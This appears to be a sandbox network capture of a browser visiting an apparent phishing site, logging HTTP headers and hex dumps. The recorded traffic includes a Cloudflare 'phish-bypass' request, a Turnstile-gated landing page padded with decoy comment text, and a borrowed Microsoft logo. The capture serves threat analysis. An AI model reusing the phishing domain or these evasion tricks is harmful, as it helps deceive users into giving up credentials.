                                                                                        2025-03-20 17:46:26 UTC202INData Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                        Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                        2025-03-20 17:46:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.1649717172.67.216.2074436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:26 UTC450OUTGET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1
                                                                                        Host: incomestatementdocument.classical.it.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:26 UTC409INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:26 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 452
                                                                                        Connection: close
                                                                                        Last-Modified: Fri, 14 Mar 2025 21:23:45 GMT
                                                                                        ETag: "67d49e61-1c4"
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9237076a3f64c402-EWR
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Expires: Thu, 20 Mar 2025 19:46:26 GMT
                                                                                        Cache-Control: max-age=7200
                                                                                        Cache-Control: public
                                                                                        Accept-Ranges: bytes
                                                                                        2025-03-20 17:46:26 UTC452INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 03 00 00 00 bb 9b 9a ef 00 00 00 33 50 4c 54 45 c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f ab b2 22 ed 00 00 00 11 74 52 4e 53 00 40 30 10 60 8f bf ff ef 7f af 9f df 20 50 cf 70 60 82 c8 9b 00 00 01 2f 49 44 41 54 78 01 bd d3 05 d2 b4 30 10 06 e1 8e 6c de c1 36 dc ff b2 9f 2b 95 c9 12 7e 79 4a 91 46 22 b8 c2 8b c8 80 94 6f 45 1f ac 4c 81 33 f2 ac 03 5b 1e 95 69 32 b5 94 6e 98 57 79 4a c4 91 8a 7a 26 9a 82 a9 af a4 46 95 f5 d0 1a fb 95 c7 62 bf b2 f2 e9 70 7e e3 a7 a0 df ee 7c 3a 74 35 f1 6d b3 b3 99 66 70 af 69 f2 2f 65 ef c7 fa 99 25 de 25 1b c9 b4 f0 6e d2 50 a6 ed fb 65
                                                                                        Data Ascii: PNGIHDR663PLTEE?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?"tRNS@0` Pp`/IDATx0l6+~yJF"oEL3[i2nWyJz&Fbp~|:t5mfpi/e%%nPe


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.1649720172.67.216.2074436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:34 UTC863OUTGET /cdn-cgi/phish-bypass?atok=qbZKTob1vc49eZEQNjBdlDAI03z6mL1m7vTSqeBdGpo-1742492784-0.0.1.1-%2FNC6tS%2F HTTP/1.1
                                                                                        Host: incomestatementdocument.classical.it.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Referer: https://incomestatementdocument.classical.it.com/NC6tS/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:35 UTC511INHTTP/1.1 301 Moved Permanently
                                                                                        Date: Thu, 20 Mar 2025 17:46:35 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 167
                                                                                        Connection: close
                                                                                        Set-Cookie: __cf_mw_byp=qbZKTob1vc49eZEQNjBdlDAI03z6mL1m7vTSqeBdGpo-1742492784-0.0.1.1-/NC6tS/; Domain=incomestatementdocument.classical.it.com; Path=/; Max-Age=86400
                                                                                        Cache-Control: private, no-cache
                                                                                        Location: https://incomestatementdocument.classical.it.com/NC6tS/
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707a1ea29da8d-EWR
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        2025-03-20 17:46:35 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.1649721172.67.216.2074436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:36 UTC861OUTGET /NC6tS/ HTTP/1.1
                                                                                        Host: incomestatementdocument.classical.it.com
                                                                                        Connection: keep-alive
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Referer: https://incomestatementdocument.classical.it.com/NC6tS/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: __cf_mw_byp=qbZKTob1vc49eZEQNjBdlDAI03z6mL1m7vTSqeBdGpo-1742492784-0.0.1.1-/NC6tS/
                                                                                        2025-03-20 17:46:36 UTC1026INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:36 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.0.30
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Set-Cookie: PHPSESSID=u515kjbcksf5dviiqoem8t30ja; path=/
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5PG5rqBK5bQAGLYUpan1%2B38a8JZjHcW4KjnJSA%2BOf34tC5FkLhZoPsJabv%2BP%2FmoNc%2BMg35XES74tn4LAAu8W%2BnIboJnVwfp9W%2BQ4dFgGAYAfztXHazm2A7jz95Z6OY1sndl%2Faw74OUA5QdSaThYZmMOqYB8OYWrcUOrM"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707a85e47cd7f-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=107998&min_rtt=107974&rtt_var=22790&sent=6&recv=8&lost=0&retrans=1&sent_bytes=2842&recv_bytes=1433&delivery_rate=34495&cwnd=245&unsent_bytes=0&cid=134528b8b7944fb2&ts=459&x=0"
                                                                                        2025-03-20 17:46:36 UTC343INData Raw: 31 30 61 34 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 66 69 72 65 66 6c 79 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 3c 73 70 61 6e 3e 54 68 65 20 61 72 63 68 61 65 6f 6c 6f 67 69 73 74 20 64 69 73 63 6f 76 65 72 65 64 20 66 6f 73 73 69 6c 73 20 74 68 61 74 20 70 72 6f 76 69 64 65 64 20 69 6e 73 69 67 68 74 20 69 6e 74 6f 20 70 72 65 68 69 73 74 6f 72 69 63 20 6c 69 66 65 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d
                                                                                        Data Ascii: 10a4 <html lang="en"> <head> <meta charset="UTF-8"> <title>firefly</title> ... <span>The archaeologist discovered fossils that provided insight into prehistoric life.</span> --> <meta name="robots" content=
                                                                                        2025-03-20 17:46:36 UTC1369INData Raw: 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 3c 70 3e 41 6e 20 61 6d 62 69 74 69 6f 75 73 20 65 6e 74 72 65 70 72 65 6e 65 75 72 20 66 6f 75 6e 64 65 64 20 61 20 63 6f 6d 70 61 6e 79 20 74 68 61 74 20 64 69 73 72 75 70 74 65 64 20 74 68 65 20 74 65 63 68 6e 6f 6c 6f 67 79 20 69 6e 64 75 73 74 72 79 2e 3c 2f 70 3e 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: -scale=1.0"> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script> ... <p>An ambitious entrepreneur founded a company that disrupted the technology industry.</p> --> <style> *
                                                                                        2025-03-20 17:46:36 UTC1369INData Raw: 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 20 41 20 6a 6f 75 72 6e 61 6c 69 73 74 20 65 78 70 6f 73 65 64 20 63 6f 72 72 75 70 74 69 6f 6e 20 77 69 74 68 69 6e 20 61 20 70 6f 77 65 72 66 75 6c 20 63 6f 72 70 6f 72 61 74 65 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 2e 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68
                                                                                        Data Ascii: /* A journalist exposed corruption within a powerful corporate organization. */ font-size: 1rem; margin-bottom: 30px; letter-spacing: 1px; } @media (max-width
                                                                                        2025-03-20 17:46:36 UTC1187INData Raw: 20 74 72 61 64 69 74 69 6f 6e 73 20 77 6f 72 6c 64 77 69 64 65 2e 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 41 20 73 63 69 65 6e 74 69 73 74 20 66 6f 75 6e 64 20 65 76 69 64 65 6e 63 65 20 73 75 70 70 6f 72 74 69 6e 67 20 61 20 6c 6f 6e 67 2d 64 65 62 61 74 65 64 20 74 68 65 6f 72 79 20 69 6e 20 70 68 79 73 69 63 73 2e 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 30 78 34 41 41 41 41 41 41 42 42 55 45 34 53 73 63 68 53 6f 56 5f 48 71 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 78 79 6c 6f 70 68 6f 6e 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
                                                                                        Data Ascii: traditions worldwide. --> ... A scientist found evidence supporting a long-debated theory in physics. --> <span class="cf-turnstile" data-sitekey="0x4AAAAAABBUE4SschSoV_Hq" data-callback="xylophone"> </
                                                                                        2025-03-20 17:46:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.1649722104.18.95.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:36 UTC609OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://incomestatementdocument.classical.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:37 UTC386INHTTP/1.1 302 Found
                                                                                        Date: Thu, 20 Mar 2025 17:46:37 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close
                                                                                        access-control-allow-origin: *
                                                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        location: /turnstile/v0/b/708f7a809116/api.js
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707ad5ad48c87-EWR
                                                                                        alt-svc: h3=":443"; ma=86400


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.1649723172.67.187.194436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:36 UTC680OUTGET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1
                                                                                        Host: mailmeteor.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://incomestatementdocument.classical.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:37 UTC1186INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:37 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 2309
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=14400, must-revalidate
                                                                                        ETag: "fd1dd9eb8405629af71bda9e0fc8400c"
                                                                                        content-security-policy: frame-ancestors 'self' *.mailmeteor.com
                                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                                        x-content-type-options: nosniff
                                                                                        x-xss-protection: 1; mode=block
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P5rG6VBQ7RWuHPtXrNyaOLw4zuB6s59ONBR%2Bu5Y5bPBQJAkfNWvbCiwVprVsKC8QVzC18k%2BV52qslywb%2BwcBTqUEXL0Vrw%2FZaQZiCrM4MmXdUiCIbbyanCZ%2BmrC81%2BjufQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 3230
                                                                                        Accept-Ranges: bytes
                                                                                        Strict-Transport-Security: max-age=2592000
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707adab367290-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=105599&min_rtt=104601&rtt_var=23570&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1252&delivery_rate=34606&cwnd=245&unsent_bytes=0&cid=0b2db7570438b64c&ts=284&x=0"
                                                                                        2025-03-20 17:46:37 UTC183INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 06 00 00 00 f4 78 d4 fa 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 9a 49 44 41 54 78 01 ed d6 31 aa 5d 55 14 80 e1 b5 1f 8f 60 23 64 08 b7 b1 cf 10 14 c1 5e b0 b1 74 08 4e c0 c2 09 38 04 3b 3b b1 17 41 87 10 db 54 37 33 78 45 8a 40 20 3b 37 90 22 03 c8 39 24 f9 bf af d9 dd ea d6 5e ff 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: PNGIHDRxpHYssRGBgAMAaIDATx1]U`#d^tN8;;AT73xE@ ;7"9$^
                                                                                        2025-03-20 17:46:37 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c aa d6 1c e8 c5 0f 5f fd b6 f7 3c 19 e0 44 eb e1 cb 3f 9f 7d 3f 07 f8 f5 9f 47 bf df e6 5f 06 38 cf 7a fd f4 97 6f 5f fd 3c 1f d8 fd 1c e8 dd f1 ff 7a 80 d3 ac d9 d7 39 c8 5e b7 7d de fb 32 c0 69 d6 be 9b 23 1c 33 15 00 f8 a8 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00
                                                                                        Data Ascii: |_<D?}?G_8zo_<z9^}2i#3$ H@ A$ H@ A$ H@ A$ H@ A$ H@ A
                                                                                        2025-03-20 17:46:37 UTC757INData Raw: 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00
                                                                                        Data Ascii: A$ H@ A$ H@ A$ H@ A$ H@ A$ H@ A$ H@ A$ H@ A$


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.1649724104.18.95.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:37 UTC624OUTGET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://incomestatementdocument.classical.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:37 UTC471INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:37 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 48123
                                                                                        Connection: close
                                                                                        accept-ranges: bytes
                                                                                        last-modified: Tue, 18 Mar 2025 12:36:20 GMT
                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                        access-control-allow-origin: *
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707b13d8b4217-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:46:37 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 76 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                                                                        Data Ascii: "use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
                                                                                        2025-03-20 17:46:37 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                                                                        Data Ascii: e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
